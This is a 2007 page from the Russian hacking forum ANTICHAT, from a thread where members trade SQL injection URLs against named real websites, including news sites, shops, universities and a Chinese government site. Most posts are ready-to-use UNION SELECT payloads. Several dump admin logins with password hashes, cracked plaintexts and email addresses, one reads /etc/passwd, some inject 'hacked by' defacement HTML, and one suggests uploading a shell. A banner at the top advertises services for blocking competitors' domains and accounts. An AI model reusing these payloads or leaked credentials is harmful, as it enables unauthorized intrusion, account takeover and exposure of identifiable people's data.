УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 142 из 1604

142

Опции темы

Поиск в этой теме

Опции просмотра

#1411

28.03.2007, 11:53

Snap

Познающий

Регистрация: 05.02.2007

Сообщений: 71

Провел на форуме:
423288

Репутация: 82

Отправить сообщение для Snap с помощью ICQ

http://moto.ru/news/motonews.php?id=-569+union+select+1,concat(login,char(58),password, char(58),email),3+from+user+limit+0,1/*

#1412

28.03.2007, 11:57

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

doctor-al.ru

#блог - wordpress(ru)

Код:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass,user_email),5,6,7+from+wp_users/*&type=news

admin:bcbe4299f228fe2c719266277c7d360f:site_admin@doctor-al.ru == b08323

идем дальше..
#форум - phpbb

Код:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_password,user_email),5,6,7+from+phpbb_users+limit+1,1/*&type=news

admin:8542516f8870173d7d1daba1daaaf0a1:admin@doctor-al.ru == 12321
мда, админы не меняются

можете попробовать залить шелл.

и напоследок
#shop

Код:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,login,password,email),5,6,7+from+shop_users+limit+0,1/*&type=news

расшифровал пару хешей ради интереса.. ничего примечательного в шопе не нашел.
nytro:827ccb0eea8a706c4c34a16891f84e7b:ruslan.shchipun@gmail.com == 12345

думаю, пути к формам авторизации найдете сами

#1413

28.03.2007, 16:46

random

Познающий

Регистрация: 05.09.2006

Сообщений: 50

Провел на форуме:
1988972

Репутация: 250

Код:

http://zjz.moc.gov.cn/cms/news.php?infoid=-2731+union+select+1,2,3,4,5,user,7,8,9,10,11,12,13,14,15,16,17,password,19,20,21+from+mysql.user/*

#1414

28.03.2007, 17:23

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

http://www.it-news.cc/index.php?type=article&ID=-0000003294%20union%20select%20concat_ws(char(58),u sername,email,user_icq,password)%20from%20itacadem y.User/*

Цитата:

http://duckhenge.uoregon.edu/io/article.php?id=-611%20union%20select%201,user(),3,4,5,6,7,8,9,0,11 ,12,13,14,15,16/*

Цитата:

http://www.michaelyon-online.com/flf/author.php?ID=-407%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,LOAD_FILE(0x2f6574632f706173737764),3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58/*

Цитата:

http://www.michaelyon-online.com/flf/author.php?ID=-407%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,password,33,user,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20fr om%20mysql.user/*

#1415

28.03.2007, 17:57

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

A FATAL MYSQL ERROR
http://keygen.us/top/comments.php?id='+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76, 77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100/*

Мот кто подберет, я так и не подобрал... хотя до 100 дошел.

#1416

28.03.2007, 18:02

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Прошолся по шопам и настигла неудача с таблицами=\

Код:

http://www.sokkia.hu/shop/shopping/index.php?id=-10+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3+from+users/*

Код:

http://www.schleifer.hu/shop.php?id=-65+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3+from+users/*

Код:

http://demo.skymarket.hu/shop.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4+from+users/*

Последний раз редактировалось XTErner; 28.03.2007 в 18:09..

#1417

28.03.2007, 21:02

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

www.islet.ru

магаз

Код:

http://www.islet.ru/subcategory.php?SCID=-1+union+select+1,convert(version(),char)/*

#1418

28.03.2007, 21:02

genom--

Постоянный

Регистрация: 09.07.2006

Сообщений: 937

Провел на форуме:
1948091

Репутация: 1686

http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,CHAR(60,72,49,62,104,97,99,107, 101,100,32,98,121,32,103,101,110,111,109,60,47,72, 49,62),4,5,6,7,8,9,10,11,12,13

найдено с использованием google dump-er

#1419

28.03.2007, 21:15

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://skidkivtule.ru/organizations.php?org=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16/*

Код:

http://www.timber.ru/?show=ad&n=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*

#1420

28.03.2007, 21:18

genom--

Постоянный

Регистрация: 09.07.2006

Сообщений: 937

Провел на форуме:
1948091

Репутация: 1686

http://www.mmu.ac.uk/policy/policy.php?id=-1+union+select+1,99,4,21,1,88,CHAR(60,72,49,62,104 ,97,99,107,%20101,100,32,98,121,32,103,101,110,111 ,109,60,47,72,%2049,62),66,5,5,3,4,5,6,7/*

найдено с помощью google dump-er